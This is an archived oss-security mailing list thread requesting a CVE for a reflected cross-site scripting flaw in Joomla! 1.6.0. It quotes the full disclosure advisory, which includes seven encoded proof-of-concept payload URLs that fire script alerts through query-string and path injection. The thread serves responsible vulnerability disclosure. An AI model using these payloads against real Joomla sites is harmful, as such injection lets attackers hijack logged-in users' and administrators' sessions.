Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Fri, 18 Mar 2011 14:04:57 +0800
From: YGN Ethical Hacker Group <lists@...g.net>
To: oss-security@...ts.openwall.com
Cc: Josh Bressers <bressers@...hat.com>, coley <coley@...re.org>
Subject: Re: CVE Request: Joomla! 1.6.0 | Cross Site Scripting
 (XSS) Vulnerability

I didn't happen to ask CVE for Joomla 1.5.20.
Please assign new one or tie this CVE also that 1.5.20.

Thanks!


On Tue, Mar 15, 2011 at 4:51 AM, Josh Bressers <bressers@...hat.com> wrote:
> Please use CVE-2011-1152
>
> Did the original report for 1.5.20 get a CVE id? (I couldn't find one)
>
> Thanks.
>
> --
>    JB
>
>
> ----- Original Message -----
>> ==========================================
>> Joomla! 1.6.0 | Cross Site Scripting (XSS) Vulnerability
>> ==========================================
>>
>>
>> 1. OVERVIEW
>>
>> Joomla! 1.6.0 was vulnerable to Cross Site Scripting.
>>
>>
>> 2. PRODUCT DESCRIPTION
>>
>> Joomla is a free and open source content management system (CMS) for
>> publishing content on the World Wide Web and intranets. It comprises a
>> model–view–controller (MVC) Web application framework that can also be
>> used independently.
>> Joomla is written in PHP, uses object-oriented programming (OOP)
>> techniques and software design patterns, stores data in a MySQL
>> database, and includes features such as page caching, RSS feeds,
>> printable versions of pages, news flashes, blogs, polls, search, and
>> support for language internationalization.
>>
>>
>> 3. VULNERABILITY DESCRIPTION
>>
>> The Query String parameter was not properly sanitized upon submission
>> to the /index.php url, which allows attacker to conduct Cross Site
>> Scripting attack. This may allow an attacker to create a specially
>> crafted URL that would execute arbitrary script code in a victim's
>> browser.
>>
>>
>> 4. VERSION AFFECTED
>>
>> Joomla! 1.6.0
>>
>>
>> 5. PROOF-OF-CONCEPT/EXPLOIT
>>
>> >>> SEO-enabled Joomla 1.6.0
>>
>> http://attacker.in/joomla160/index.php/%2522%253E%253Cimg%2520src%253Da%2520onerror%253Dalert(String.fromCharCode(88,83,83))%253E09739572178%252F
>>
>> http://attacker.in/joomla160/index.php/using-joomla/extensions/components/search-component/search/'%2522%253E%253Cscript%253Ealert(%252FXSS%252F)%253C%252Fscript%253E
>>
>> http://attacker.in/joomla160/index.php/contact-us/'%2522%253E%253Cscript%253Ealert(%252FXSS%252F)%253C%252Fscript%253E
>>
>> http://attacker.in/joomla160/index.php/park-links?'%2522%253E%253Cscript%253Ealert(%252FXSS%252F)%253C%252Fscript%253E=1
>>
>> http://attacker.in/joomla160/index.php/using-joomla/extensions/templates?'%2522%253E%253Cscript%253Ealert(%252FXSS%252F)%253C%252Fscript%253E=1
>>
>>
>> >>> SEO-disabled Joomla 1.6.0
>>
>> http://attacker.in/joomla160x/index.php?option=com_weblinks&view=category&id=18&Itemid=227&a86a9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9666d64388c=1
>>
>> http://attacker.in/joomla160x/index.php?option=com_content&view=category&layout=blog&id=21&Itemid=268&%2522%253e%253cscript%253ealert%280%29%253c/script%253e=XSS
>>
>>
>> This is the exactly same variant as shown in our last year demo video
>> in 1.5.20:
>>
>> http://yehg.net/lab/pr0js/training/view/misc/joomla-1.5.20_encoded-xss/
>>
>> We thought Joomla! team would fix this issue in 1.6.0 stable release
>> whilst they fixed it in Joomla! 1.5.21!
>>
>>
>> 6. IMPACT
>>
>> Attackers can compromise currently logged-in user/administrator
>> session and impersonate arbitrary user actions available under
>> /administrator/ functions.
>>
>>
>> 7. SOLUTION
>>
>> Upgrade to Joomla! 1.6.1 or higher
>>
>>
>> 8. VENDOR
>>
>> Joomla! Developer Team
>> http://www.joomla.org
>>
>>
>> 9. CREDIT
>>
>> This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
>> Ethical Hacker Group, Myanmar.
>>
>>
>> 10. DISCLOSURE TIME-LINE
>>
>> 2011-01-24: notified vendor
>> 2011-03-08: vendor released fix
>> 2011-03-14: vulnerability disclosed
>>
>>
>> 11. REFERENCES
>>
>> Original Advisory URL:
>> http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.0]_cross_site_scripting(XSS)
>> Former Advisory URL:
>> http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.5.20]_cross_site_scripting(XSS)
>> XSS FAQ: http://www.cgisecurity.com/xss-faq.html
>> OWASP Top 10:
>> http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
>> CWE-79: http://cwe.mitre.org/data/definitions/79.html
>>
>>
>> #yehg [2011-03-14]
>>
>>
>>
>>
>> ---------------------------------
>> Best regards,
>> YGN Ethical Hacker Group
>> Yangon, Myanmar
>> http://yehg.net
>> Our Lab | http://yehg.net/lab
>> Our Directory | http://yehg.net/hwd
>

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.